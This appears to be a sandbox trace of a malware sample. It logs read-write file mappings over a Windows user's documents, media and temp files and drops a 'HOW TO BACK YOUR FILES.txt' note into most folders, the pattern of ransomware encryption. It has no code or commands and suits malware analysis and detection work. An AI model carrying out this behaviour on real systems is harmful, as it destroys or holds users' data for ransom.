Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\knQ-Rci.m4a filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\knQ-Rci.m4a, protection = PAGE_READWRITE, maximum_size = 37440 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\PytqJVdftFy7.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\PytqJVdftFy7.mp3, protection = PAGE_READWRITE, maximum_size = 22256 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\Y61U0ZM ieIG3.mp3 filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\Y61U0ZM ieIG3.mp3, protection = PAGE_READWRITE, maximum_size = 35648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\MVCFvXeIE_Qtn.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\MVCFvXeIE_Qtn.pptx, protection = PAGE_READWRITE, maximum_size = 19744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\rgQBy-ZQ.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\rgQBy-ZQ.docx, protection = PAGE_READWRITE, maximum_size = 89424 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\w75wj2Ar4H7R.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\w75wj2Ar4H7R.pptx, protection = PAGE_READWRITE, maximum_size = 17312 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\_EGFqZRU0R-jfWliuRra.pps filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\_EGFqZRU0R-jfWliuRra.pps, protection = PAGE_READWRITE, maximum_size = 72848 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\tXURx5G nKz1-yFLOrN2.ods filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\tXURx5G nKz1-yFLOrN2.ods, protection = PAGE_READWRITE, maximum_size = 96176 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\UU3lmUypRB5ho.pdf filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\UU3lmUypRB5ho.pdf, protection = PAGE_READWRITE, maximum_size = 97856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\UZluNg.xls filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\UZluNg.xls, protection = PAGE_READWRITE, maximum_size = 44352 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\YwlwHTYTPBDD.ods filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\YwlwHTYTPBDD.ods, protection = PAGE_READWRITE, maximum_size = 88464 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\6sKwaVfWDs- N8iI76.odp filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\6sKwaVfWDs- N8iI76.odp, protection = PAGE_READWRITE, maximum_size = 53424 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\AzKSh6mANQ.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\AzKSh6mANQ.xlsx, protection = PAGE_READWRITE, maximum_size = 14784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\kJcIUIZYh.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\kJcIUIZYh.xlsx, protection = PAGE_READWRITE, maximum_size = 19168 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\LYfHjF1fhtf.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\LYfHjF1fhtf.docx, protection = PAGE_READWRITE, maximum_size = 61648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\nzQhV4\M2UT\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\25Syj.ppt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\25Syj.ppt, protection = PAGE_READWRITE, maximum_size = 35760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\as zumeG BO7h.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\as zumeG BO7h.docx, protection = PAGE_READWRITE, maximum_size = 16960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\j19gTj0.odt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\j19gTj0.odt, protection = PAGE_READWRITE, maximum_size = 12752 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\oyOp6 2 8AWICxI.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\oyOp6 2 8AWICxI.docx, protection = PAGE_READWRITE, maximum_size = 98288 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\XARM70VArEzpuNLrV2.pdf filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\XARM70VArEzpuNLrV2.pdf, protection = PAGE_READWRITE, maximum_size = 101280 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\8OgR8sFF5hH-i.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\8OgR8sFF5hH-i.docx, protection = PAGE_READWRITE, maximum_size = 6336 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\HcIdfOBoqv.doc filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\HcIdfOBoqv.doc, protection = PAGE_READWRITE, maximum_size = 39456 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\IKBwdpaf.ppt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\IKBwdpaf.ppt, protection = PAGE_READWRITE, maximum_size = 73504 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\VEq539zWuZZr8rHls6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\dNHkA8wGrHl1i.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\dNHkA8wGrHl1i.docx, protection = PAGE_READWRITE, maximum_size = 63568 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\neWkdufSFGT9V.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\neWkdufSFGT9V.xlsx, protection = PAGE_READWRITE, maximum_size = 93632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\UD6h0kBtk.pdf filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\UD6h0kBtk.pdf, protection = PAGE_READWRITE, maximum_size = 2480 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\wq1KdpB5Z.doc filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\wq1KdpB5Z.doc, protection = PAGE_READWRITE, maximum_size = 68544 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\yP7-fIabHWCsx0qu8I.ppt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\yP7-fIabHWCsx0qu8I.ppt, protection = PAGE_READWRITE, maximum_size = 62656 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\ay6xZDWXtjDvQtZ\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\B47wIBV.ots filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\B47wIBV.ots, protection = PAGE_READWRITE, maximum_size = 25632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\jNRxBhMqWYH.pps filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\jNRxBhMqWYH.pps, protection = PAGE_READWRITE, maximum_size = 91904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\Cu4 _Kg2TlnQBd\AfAqhaEDPAX\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\-xx1WPzrvn9hNRC9SK.csv filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\-xx1WPzrvn9hNRC9SK.csv, protection = PAGE_READWRITE, maximum_size = 44624 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\7vYmr.xls filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\7vYmr.xls, protection = PAGE_READWRITE, maximum_size = 91072 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\9uXV.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\9uXV.pptx, protection = PAGE_READWRITE, maximum_size = 43040 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\EBOTTvLtpAXwg.ods filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\EBOTTvLtpAXwg.ods, protection = PAGE_READWRITE, maximum_size = 74816 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\FS7rFKvZONVfHr.odt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\FS7rFKvZONVfHr.odt, protection = PAGE_READWRITE, maximum_size = 61568 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\5-Bb3L9v35.odp filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\5-Bb3L9v35.odp, protection = PAGE_READWRITE, maximum_size = 84032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\eL us.docx filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\eL us.docx, protection = PAGE_READWRITE, maximum_size = 25792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\ESkoG93QSJ_.rtf filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\ESkoG93QSJ_.rtf, protection = PAGE_READWRITE, maximum_size = 66080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\My Documents\hiQVSkpdhpvZTGyxL33N\3jSNDgBWYe\Tps2fgu2r\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\IconCache.db filename = C:\Documents and Settings\FD1HVy\Local Settings\IconCache.db, protection = PAGE_READWRITE, maximum_size = 70672 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\VirtualStore\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\VirtualStore\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\UNP\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\UNP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB.chk filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB.chk, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB00005.log filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB00005.log, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Users\FD1HVy\Searches\Everywhere.search-ms filename = C:\Users\FD1HVy\Searches\Everywhere.search-ms, protection = PAGE_READWRITE, maximum_size = 1024 True 1
Fn
Create Mapping C:\Users\FD1HVy\Searches\Indexed Locations.search-ms filename = C:\Users\FD1HVy\Searches\Indexed Locations.search-ms, protection = PAGE_READWRITE, maximum_size = 1024 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBres00001.jrs filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBres00001.jrs, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBres00002.jrs filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBres00002.jrs, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBtmp.log filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBtmp.log, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\Microsoft\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Virtualized\C\Users\FD1HVy\AppData\Local\Microsoft\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\IE\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Low\IE\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\IE\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\IE\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.Word\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.Word\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\VisioLogFiles\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temporary Internet Files\Content.MSO\VisioLogFiles\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\0V n6rYTpHpdA3E65ees.flv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\0V n6rYTpHpdA3E65ees.flv, protection = PAGE_READWRITE, maximum_size = 17440 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\12BcEHtQ0V38CA9zYhL.mp4 filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\12BcEHtQ0V38CA9zYhL.mp4, protection = PAGE_READWRITE, maximum_size = 96432 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\1Y0UN5hynKhytGvOu.wav filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\1Y0UN5hynKhytGvOu.wav, protection = PAGE_READWRITE, maximum_size = 88640 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\AICpHn.jpg filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\AICpHn.jpg, protection = PAGE_READWRITE, maximum_size = 59232 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\d57ide9nP.xlsx filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\d57ide9nP.xlsx, protection = PAGE_READWRITE, maximum_size = 20224 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\dtLMm0n.wav filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\dtLMm0n.wav, protection = PAGE_READWRITE, maximum_size = 89312 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\ej27UGYl-.pptx filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\ej27UGYl-.pptx, protection = PAGE_READWRITE, maximum_size = 41056 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\EmjD9XD RJD4w7EHy6.ppt filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\EmjD9XD RJD4w7EHy6.ppt, protection = PAGE_READWRITE, maximum_size = 42096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\EwTVv.swf filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\EwTVv.swf, protection = PAGE_READWRITE, maximum_size = 14256 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\fR2yAN Ii_9.flv filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\fR2yAN Ii_9.flv, protection = PAGE_READWRITE, maximum_size = 77472 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\fxbPqybTufBl8GXXE.mp3 filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\fxbPqybTufBl8GXXE.mp3, protection = PAGE_READWRITE, maximum_size = 12576 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\HggFk6UK.m4a filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\HggFk6UK.m4a, protection = PAGE_READWRITE, maximum_size = 62928 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\HX1-Y1fy.xlsx filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\HX1-Y1fy.xlsx, protection = PAGE_READWRITE, maximum_size = 94816 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Temp\j0plGyI Tzt4g.mp3 filename = C:\Documents and Settings\FD1HVy\Local Settings\Temp\j0plGyI Tzt4g.mp3, protection = PAGE_READWRITE, maximum_size = 40576 True 1
Fn
